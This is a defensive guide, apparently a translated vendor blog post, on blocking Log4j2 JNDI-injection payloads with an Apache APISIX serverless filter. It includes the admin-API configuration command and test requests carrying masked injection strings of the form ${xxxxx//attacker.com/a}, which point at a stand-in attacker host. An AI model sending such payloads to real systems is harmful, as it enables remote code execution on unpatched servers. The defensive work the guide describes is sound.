Recently, the Remote Code Execution Vulnerability of Apache Log4j2 was exposed on the network. The vulnerability was exposed in advance before the Apache Log4j2 development team completely repaired it, resulting in the use of Log4j2 2 X to 2.14 All projects in version 1 are at risk of being attacked.
Vulnerability analysis
From the process of the vulnerability recurrence, we can analyze that the key step of exploiting the vulnerability is to construct a malicious payload, similar to
{xxxxx//attacker.com/a}Before the official release of the fully repaired version and the upgrade of the current environment to the repaired version, a temporary measure is needed to intercept requests carrying malicious loads to protect the service from the opposition attack of this vulnerability.
Apache APIs IX Countermeasures
We can filter the request payload on Apache APIs IX, match the keyword of malicious payload with regular and intercept it.
Assuming that the keyword of payload is "xxxxx", you can use serverless plug-in to execute custom interception script. The configuration example is as follows:
curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"uri": "/*",
"plugins":{
"serverless-pre-function":{
"phase":"rewrite",
"functions":[
"return function(conf, ctx) local core = require(\"apisix.core\"); local payload, err = core.request.get_body(); if not payload then local uri_args, err = core.request.get_uri_args(ctx)\n if uri_args then payload = core.json.encode(uri_args, true) end; end; local m = ngx.re.match(payload, \"xxxxx\", \"jo\"); if m then ngx.exit(403) end; end"
]
}
},
"upstream": {
"type": "roundrobin",
"nodes": {
"127.0.0.1:1980": 1
}
}
}'Note: the configuration related to serverless pre function in the above configuration is part of user-defined script. Other configurations are the general configuration of Apache APIs IX, please adjust according to the actual situation.
The script corresponding to the above functions field mainly does the following things
- Extract the request load (including the URL parameter transfer method of GET request and the parameter transfer method of POST/PUT request body)
- Regular matching malicious payload
- Intercept requests carrying malicious payload
The script provides the implementation idea of handling such malicious load requests, mainly to capture attack features, such as jndi keywords. You can improve or optimize the script according to your own needs.
verification
Intercept malicious payload in GET request parameters:
curl -I 'http://127.0.0.1:9080/hello?foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
......Intercept the malicious load carried in the POST request body (application/json):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/json' -X POST -d '
{
"foo": "${xxxxx//attacker.com/a}"
}'
HTTP/1.1 403 Forbidden
......Intercept the malicious payload carried in the POST request body (text/plain):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: text/plain' -X POST -d '
{xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
......Intercept the malicious load carried in the POST request body (application/x-www-form-urlencoded, no URL encoding for the request body):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d '
foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
......About Apache APIs IX
Apache APISIX is a dynamic, real-time, high-performance open source API gateway, which provides rich traffic management functions such as load balancing, dynamic upstream, gray publishing, service fusing, identity authentication, observability and so on. Apache APIs IX can help enterprises handle API and microservice traffic quickly and safely, including gateway, Kubernetes Ingress and service grid.
Apache APIs IX landing users (partial only)
- Apache APISIX GitHub: https://github.com/apache/apisix
- Apache APIs IX official website: https://apisix.apache.org/
- Apache APIs IX documentation: https://apisix.apache.org/zh/...